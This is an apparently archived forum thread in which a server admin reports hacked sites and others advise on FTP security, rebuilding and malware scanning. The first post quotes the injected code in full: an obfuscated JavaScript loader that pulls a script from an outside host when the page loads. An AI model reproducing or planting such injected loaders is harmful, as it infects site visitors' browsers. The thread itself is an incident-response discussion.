hack problem with FTP

#1
20th December 2009, 07:14
mumbly

Hi,
My three servers have been hacked these days.
One (big) line of code has been added at the end of some files (index, etc.) by someone or something ... This is the code:

Quote:
<script>/*GNU GPL*/ try{window.onload = function(){var A84jbd5xsu = document.createElement('script');A84jbd5xsu.setAtt ribute('type', 'text/javascript');A84jbd5xsu.setAttribute('id', 'myscript1');A84jbd5xsu.setAttribute('src', 'h^&(t)$t(!^p($^(:$@(/!!)/@x!()@n&!$x&!!@x^!&(-(c#)o#!m!!(.$n^!#(u^((.@)#n&!(l$@@.#^@@w$()3&)(-$o)#r$^(g)@!&.@#&g(^o!&l!)&d!@^g@&)o&@#l^^f(!b!!a# )#@g^$^@.#(^^r)&#u@!:!&$$8)0&)#8#!(0^/@w()$^e&(&e&b)&l@@#y&$!.@c&&&o)@^!$m$@/$$&@w$^)@e^e!(b))l(^y&)&.)(c!!!o^&m!($^/(^)!l!!&(a!^$r@!e#&d$!#o)(^u(t(e$(.$f@!r!$(/!!g$!^)&o^@#$o@#$(g@^l##e^!(.)(&c!$o)$&m@^@/##!)#r&@i!#n^$(c))!$o#&)n@(!d^&e&l#&@v&)a($$!g@^)# o#&^!.((^c@)&&o!!)!m!/)$'.replace(/@|\^|\)|#|&|\$|\(|\!/ig, ''));A84jbd5xsu.setAttribute('defer', 'defer');document.body.appendChild(A84jbd5xsu);}} catch(e) {}</script>
It seems (???) that this is a ftp problem.
As long as my 3 servers have been configured with Ubuntu 8.04 LTS, fully updated, with ISPConfig 2 (last version 2.2.35), I do admit that I am a bit confused with that...

Here is some more news about this :
- http://seoforums.org/site-optimizati...ction-var.html

THE BIG QUESTION: HOW-TO secure more FTP? Must I change the passwords for now?

At last, I must say that all of my servers are configured according to "Ubuntu Perfect Server" from howtoforge.org.

#2
20th December 2009, 13:45
falko

You can try to use TLS with ProFTPd: http://www.howtoforge.com/setting-up...unty-jackalope

And yes, I think it's a good idea to change passwords.

#3
21st December 2009, 09:14
mumbly

Hi!
Thanks!
I've used http://www.howtoforge.com/setting-up...unty-jackalope to configure my ProFTPd / ISPConfig 2 server ... But I can NOT connect to my server:
proftpd tls 500 AUTH not understood

If I comment out
#Include /etc/proftpd_ispconfig.conf
it connects BUT it can not list the repositories ...

Any idea???

#4
21st December 2009, 13:41
Ben

I don't know the exact switch on how to check which proftp modules are loaded. Nevertheless you can check this, as there is a specific module that needs to be loaded for TLS. I tried this on my Debian machine some time ago, but did not get it working as there was no possibility to have this module loaded, as it seems that it does anyhow not exist in the Debian version of proftpd.

But independent of that, if the server was really hacked I would consider rebuilding the whole servers as you can never be sure whether a rootkit or similar was installed on your machine, so changing passwords would be no real help.
Did you also check your machine with e.g. rkhunter?

#5
22nd December 2009, 15:33
falko

Quote:
Originally Posted by mumbly
If I comment out
#Include /etc/proftpd_ispconfig.conf
it connects BUT it can not list the repositories ...

Any idea???
Have you tried both active and passive transfers in your FTP client?

#6
22nd December 2009, 16:22
Mark_NL

I've seen this before, for me, it was a customer who used an illegal version of CuteFTP (used a file called patch.exe) which actually contained a keylogger, logged the login credentials, and could login straight away without any errors, added the code in ALL index.* files and logged off.

Install rkhunter and clamav and scan your disc for more infections .. because your websites will be reported as "deformed/malware" through firefox/google very fast.